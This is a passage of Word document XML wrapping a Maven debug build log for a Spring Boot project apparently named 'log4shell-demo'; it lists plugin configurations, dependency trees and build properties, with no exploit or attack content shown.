      </w:r>
    </w:p>
    <w:p w14:paraId="070E12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&lt;useDefaultDelimiters default-value="true"&gt;false&lt;/useDefaultDelimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F1B4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70AB416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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F900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Goal:          org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile (default-testCompile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F85F7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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2162C5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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652E40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3A7580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&lt;basedir default-value="${basedir}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DA13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&lt;buildDirectory default-value="${project.build.directory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7118F1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&lt;compilePath default-value="${project.compileClasspathElements}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EFBC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&lt;compileSourceRoots default-value="${project.testCompileSourceRoots}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C13B4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&lt;compilerId default-value="javac"&gt;${maven.compiler.compilerId}&lt;/compilerId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFFEF9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&lt;compilerReuseStrategy default-value="${reuseCreated}"&gt;${maven.compiler.compilerReuseStrategy}&lt;/compilerReuseStrategy&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47970E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&lt;compilerVersion&gt;${maven.compiler.compilerVersion}&lt;/compilerVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091824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&lt;debug default-value="true"&gt;${maven.compiler.debug}&lt;/debug&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E358F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&lt;debuglevel&gt;${maven.compiler.debuglevel}&lt;/debuglevel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D16F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&lt;encoding default-value="${project.build.sourceEncoding}"&gt;${encoding}&lt;/encoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A54E9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&lt;executable&gt;${maven.compiler.executable}&lt;/executable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C542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&lt;failOnError default-value="true"&gt;${maven.compiler.failOnError}&lt;/failOnError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A0E96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&lt;failOnWarning default-value="false"&gt;${maven.compiler.failOnWarning}&lt;/failOnWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6225CA1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&lt;forceJavacCompilerUse default-value="false"&gt;${maven.compiler.forceJavacCompilerUse}&lt;/forceJavacCompilerUse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC783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&lt;fork default-value="false"&gt;${maven.compiler.fork}&lt;/fork&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271B950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&lt;generatedTestSourcesDirectory default-value="${project.build.directory}/generated-test-sources/test-annotations"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682FEC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&lt;maxmem&gt;${maven.compiler.maxmem}&lt;/maxmem&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118934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&lt;meminitial&gt;${maven.compiler.meminitial}&lt;/meminitial&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BDFB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&lt;mojoExecution default-value="${mojoExecution}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7552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&lt;optimize default-value="false"&gt;${maven.compiler.optimize}&lt;/optimize&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E963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&lt;outputDirectory default-value="${project.build.testOutputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A05E3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&lt;parameters default-value="false"&gt;true&lt;/parameters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344A99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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE70E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&lt;release&gt;${maven.compiler.release}&lt;/release&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3735C8D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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256783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&lt;showDeprecation default-value="false"&gt;${maven.compiler.showDeprecation}&lt;/showDeprecation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F29CE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&lt;showWarnings default-value="false"&gt;${maven.compiler.showWarnings}&lt;/showWarnings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F079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&lt;skip&gt;${maven.test.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11805E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&lt;skipMultiThreadWarning default-value="false"&gt;${maven.compiler.skipMultiThreadWarning}&lt;/skipMultiThreadWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B8B2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&lt;source default-value="1.6"&gt;${maven.compiler.source}&lt;/source&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA499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&lt;staleMillis default-value="0"&gt;${lastModGranularityMs}&lt;/staleMillis&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A0303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&lt;target default-value="1.6"&gt;${maven.compiler.target}&lt;/target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49667A7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&lt;testPath default-value="${project.testClasspathElements}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B75AB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&lt;testRelease&gt;${maven.compiler.testRelease}&lt;/testRelease&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C539A3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&lt;testSource&gt;${maven.compiler.testSource}&lt;/testSource&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E502E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&lt;testTarget&gt;${maven.compiler.testTarget}&lt;/testTarget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451BCF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&lt;useIncrementalCompilation default-value="true"&gt;${maven.compiler.useIncrementalCompilation}&lt;/useIncrementalCompilation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F0AE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&lt;verbose default-value="false"&gt;${maven.compiler.verbose}&lt;/verbose&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A700A5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674A0A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exit fork of com.example:log4shell-demo:0.0.1-SNAPSHOT for org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E90B1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30002CA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Goal:          org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BDDFF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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4572F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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F57AFE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720483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&lt;addResources default-value="false"&gt;${spring-boot.run.addResources}&lt;/addResources&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323455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&lt;agents&gt;${spring-boot.run.agents}&lt;/agents&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCC972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&lt;classesDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE97E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&lt;commandlineArguments&gt;${spring-boot.run.arguments}&lt;/commandlineArguments&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A6DE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&lt;directories&gt;${spring-boot.run.directories}&lt;/directories&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AFBD2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&lt;excludeGroupIds default-value=""&gt;${spring-boot.excludeGroupIds}&lt;/excludeGroupIds&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F8A5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&lt;excludes&gt;${spring-boot.excludes}&lt;/excludes&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E8CD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&lt;fork default-value="true"&gt;${spring-boot.run.fork}&lt;/fork&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161665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&lt;includes&gt;${spring-boot.includes}&lt;/includes&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74310B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&lt;jvmArguments&gt;${spring-boot.run.jvmArguments}&lt;/jvmArguments&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189620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&lt;mainClass&gt;com.example.Log4ShellDemoApplication&lt;/mainClass&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5256AE4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&lt;noverify&gt;${spring-boot.run.noverify}&lt;/noverify&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626924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&lt;optimizedLaunch default-value="true"&gt;${spring-boot.run.optimizedLaunch}&lt;/optimizedLaunch&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A07D2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&lt;profiles&gt;${spring-boot.run.profiles}&lt;/profiles&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EDE2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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12202E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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A597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&lt;skip default-value="false"&gt;${spring-boot.run.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B40A5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&lt;useTestClasspath default-value="false"&gt;${spring-boot.run.useTestClasspath}&lt;/useTestClasspath&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FE5B4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&lt;workingDirectory&gt;${spring-boot.run.workingDirectory}&lt;/workingDirectory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300106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3276015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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E098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F6025E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&gt;&gt;&gt; spring-boot-maven-plugin:2.5.5:run (default-cli) &gt; test-compile @ log4shell-demo &gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669A1E9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Dependency collection stats {ConflictMarker.analyzeTime=540491, ConflictMarker.markTime=158892, ConflictMarker.nodeCount=61, ConflictIdSorter.graphTime=313609, ConflictIdSorter.topsortTime=187854, ConflictIdSorter.conflictIdCount=32, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=12034444, ConflictResolver.conflictItemCount=60, DefaultDependencyCollector.collectTime=182333433, DefaultDependencyCollector.transformTime=24726440}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4194C9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com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F28A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org.springframework.boot:spring-boot-starter-web:jar:2.5.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC14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org.springframework.boot:spring-boot-starter:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069499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org.springframework.boot:spring-boot:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD2C7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org.springframework.boot:spring-boot-autoconfigure:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2A42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org.springframework.boot:spring-boot-starter-logging:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244B0C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ch.qos.logback:logback-classic:jar:1.2.6:compile (version managed from 1.2.6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503EFB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ch.qos.logback:logback-core:jar:1.2.6:compile (version managed from 1.2.6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5230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org.slf4j:slf4j-api:jar:1.7.32:compile (version managed from 1.7.32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B27BDB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org.apache.logging.log4j:log4j-to-slf4j:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5A5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org.apache.logging.log4j:log4j-api:jar:2.14.1:compile (version managed from 2.14.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C2EE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org.slf4j:jul-to-slf4j:jar:1.7.32:compile (version managed from 1.7.32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583A52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jakarta.annotation:jakarta.annotation-api:jar:1.3.5:compile (version managed from 1.3.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50792F9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org.springframework:spring-core:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542451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org.springframework:spring-jcl:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106524C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org.yaml:snakeyaml:jar:1.28:compile (version managed from 1.28)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13401D6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org.springframework.boot:spring-boot-starter-json:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB442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com.fasterxml.jackson.core:jackson-databind:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277817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com.fasterxml.jackson.core:jackson-annotations:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451913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com.fasterxml.jackson.core:jackson-core:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1B92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com.fasterxml.jackson.datatype:jackson-datatype-jdk8:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E323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com.fasterxml.jackson.datatype:jackson-datatype-jsr310:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDD1C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com.fasterxml.jackson.module:jackson-module-parameter-names:jar:2.12.5:compile (version managed from 2.12.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139108F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org.springframework.boot:spring-boot-starter-tomcat:jar:2.5.5:compile (version managed from 2.5.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E116C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org.apache.tomcat.embed:tomcat-embed-core:jar:9.0.53:compile (version managed from 9.0.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D841D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org.apache.tomcat.embed:tomcat-embed-el:jar:9.0.53:compile (version managed from 9.0.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105CE4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org.apache.tomcat.embed:tomcat-embed-websocket:jar:9.0.53:compile (version managed from 9.0.53)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AA96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org.springframework:spring-web:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696E95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org.springframework:spring-beans:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52611E2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org.springframework:spring-webmvc:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CDBC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org.springframework:spring-aop:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BE519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org.springframework:spring-context:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C99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org.springframework:spring-expression:jar:5.3.10:compile (version managed from 5.3.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169CF0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DD164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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05043D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mirror maven-default-http-blocker (http://0.0.0.0/) for apache.snapshots (http://repository.apache.org/snapshots).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB13E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mirror maven-default-http-blocker (http://0.0.0.0/) for repository.jboss.org (http://repository.jboss.org/maven2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A7E7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mirror maven-default-http-blocker (http://0.0.0.0/) for snapshots.jboss.org (http://snapshots.jboss.org/maven2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045F55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mirror maven-default-http-blocker (http://0.0.0.0/) for oss.sonatype.org/jboss-snapshots (http://oss.sonatype.org/content/repositories/jboss-snapshots).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585FBB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Using mirror maven-default-http-blocker (http://0.0.0.0/) for codehaus.snapshots (http://snapshots.repository.codehaus.org).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA56F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Dependency collection stats {ConflictMarker.analyzeTime=1113018, ConflictMarker.markTime=137652, ConflictMarker.nodeCount=99, ConflictIdSorter.graphTime=85994, ConflictIdSorter.topsortTime=25072, ConflictIdSorter.conflictIdCount=35, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=1002237, ConflictResolver.conflictItemCount=85, DefaultDependencyCollector.collectTime=332357107, DefaultDependencyCollector.transformTime=2422157}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B56E3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org.apache.maven.plugins:maven-resources-plugin:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F51B60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org.apache.maven:maven-plugin-api:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC01A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org.apache.maven:maven-artifact:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C6A9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org.apache.maven:maven-core:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105022E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org.apache.maven:maven-settings:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56CC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org.apache.maven:maven-settings-builder:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EC943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org.apache.maven:maven-repository-metadata:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFFB5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org.apache.maven:maven-model-builder:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEAE0E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org.apache.maven:maven-aether-provider:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C208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org.eclipse.aether:aether-spi:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED8A4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org.eclipse.aether:aether-impl:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5825B82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org.eclipse.aether:aether-api:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A17B2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org.eclipse.aether:aether-util:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A24C0C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org.codehaus.plexus:plexus-utils:jar:3.0.10:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F04B9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org.codehaus.plexus:plexus-classworlds:jar:2.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635CDF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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D01E8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org.sonatype.plexus:plexus-cipher:jar:1.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D311A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org.apache.maven:maven-model:jar:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDB859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org.codehaus.plexus:plexus-component-annotations:jar:2.0.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A211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org.codehaus.plexus:plexus-interpolation:jar:1.26:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B772B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org.eclipse.sisu:org.eclipse.sisu.plexus:jar:0.0.0.M2a:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D9108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javax.enterprise:cdi-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235BBA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javax.annotation:jsr250-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D8D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javax.inject:javax.inject:jar:1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE8DE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com.google.guava:guava:jar:10.0.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339C5B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com.google.code.findbugs:jsr305:jar:1.3.9:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10613E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org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA9BC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aopalliance:aopalliance:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B36D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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M2a:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45881F9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asm:asm:jar:3.3.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123201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org.apache.maven.shared:maven-filtering:jar:3.2.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382F7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org.apache.maven.shared:maven-shared-utils:jar:3.3.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72621E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org.sonatype.plexus:plexus-build-api:jar:0.0.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3935EDA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commons-io:commons-io:jar:2.6:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EAE0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org.apache.commons:commons-lang3:jar:3.8.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A16D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Created new class realm plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4900CB1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Importing foreign packages into class realm plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D263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&lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F46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Populating class realm plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAB8E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org.apache.maven.plugins:maven-resources-plugin:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3279D1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org.eclipse.aether:aether-util:jar:0.9.0.M2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066419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org.codehaus.plexus:plexus-utils:jar:3.0.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49282B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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2529C78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org.sonatype.plexus:plexus-cipher:jar:1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7D1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org.codehaus.plexus:plexus-component-annotations:jar:2.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487C694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org.codehaus.plexus:plexus-interpolation:jar:1.26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF4B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javax.enterprise:cdi-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6888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javax.annotation:jsr250-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B06E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com.google.guava:guava:jar:10.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46548D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com.google.code.findbugs:jsr305:jar:1.3.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA3E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org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD7BB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aopalliance:aopalliance:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D27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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M2a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D11CB4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Included: asm:asm:jar:3.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAFB9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org.apache.maven.shared:maven-filtering:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367526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org.apache.maven.shared:maven-shared-utils:jar:3.3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475123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org.sonatype.plexus:plexus-build-api:jar:0.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBE88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commons-io:commons-io:jar:2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E83AD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org.apache.commons:commons-lang3:jar:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C98C9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org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7C1D9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'org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708856F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addDefaultExcludes = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397C25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buildFilters = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC329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delimiters = [@]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E230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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7101A64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escapeWindowsPaths = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675474C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fileNameFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E114D6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includeEmptyDirs = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D3A1C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outputDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F2AAC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overwrite = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8DAF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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8A89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propertiesEncoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C698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resources = [Resource {targetPath: null, filtering: true, FileSet {directory: /home/ec2-user/log4shell-homework/src/main/resources, PatternSet [includes: {**/application*.yml, **/application*.yaml, **/application*.properties}, excludes: {}]}}, Resource {targetPath: null, filtering: false, FileSet {directory: /home/ec2-user/log4shell-homework/src/main/resources, PatternSet [includes: {}, excludes: {**/application*.yml, **/application*.yaml, **/application*.properties}]}}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC3FDD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session = org.apache.maven.execution.MavenSession@616b241a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED25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skip = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC937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supportMultiLineFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786DA0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useBuildFilters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A6410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(s) useDefaultDelimiters = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251A68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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0133CC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properties used {spring-integration.version=5.5.4, flyway.version=7.7.3, java.specification.version=17, webjars-hal-browser.version=3325375, java.vendor.url=https://aws.amazon.com/corretto/, sun.boot.library.path=/usr/lib/jvm/java-17-amazon-corretto.x86_64/lib, sun.java.command=org.codehaus.plexus.classworlds.launcher.Launcher spring-boot:run -X, jdk.debug=release, maven.version=3.8.4, javax-activation.version=1.2.0, kafka.version=2.7.1, jboss-transaction-spi.version=7.6.1.Final, java.vm.specification.vendor=Oracle Corporation, java.specification.name=Java Platform API Specification, byte-buddy.version=1.10.22, maven-install-plugin.version=2.5.2, env.which_declare=declare -f, java.runtime.version=17.0.15+6-LTS, httpclient5.version=5.0.4, env.SELINUX_ROLE_REQUESTED=, java.vendor.version=Corretto-17.0.15.6.1, env.HISTCONTROL=ignoredups, micrometer.version=1.7.4, rxjava-adapter.version=1.2.1, project.baseUri=file:/home/ec2-user/log4shell-homework/, hibernate.version=5.4.32.Final, java.io.tmpdir=/tmp, java.version=17.0.15, javax-persistence.version=2.2, jakarta-ws-rs.version=2.1.6, build-helper-maven-plugin.version=3.2.0, mockito.version=3.9.0, java.vm.specification.name=Java Virtual Machine Specification, infinispan.version=12.1.7.Final, nekohtml.version=1.9.22, maven-assembly-plugin.version=3.3.0, native.encoding=UTF-8, java.library.path=/usr/java/packages/lib:/usr/lib64:/lib64:/lib:/usr/lib, jakarta-servlet.version=4.0.4, java.vendor=Amazon.com Inc., java.specification.maintenance.version=1, thymeleaf-extras-java8time.version=3.0.4.RELEASE, undertow.version=2.2.10.Final, mariadb.version=2.7.4, selenium-htmlunit.version=2.49.1, thymeleaf-extras-data-attribute.version=2.0.1, ehcache3.version=3.9.6, jakarta-xml-bind.version=2.3.3, commons-dbcp2.version=2.8.0, env.LANG=C.UTF-8, mongodb.version=4.2.3, java.vm.specification.version=17, javax-transaction.version=1.3, maven.compiler.source=11, env.BASH_FUNC_which%%=() {  ( alias;</w:t>
      </w:r>
    </w:p>
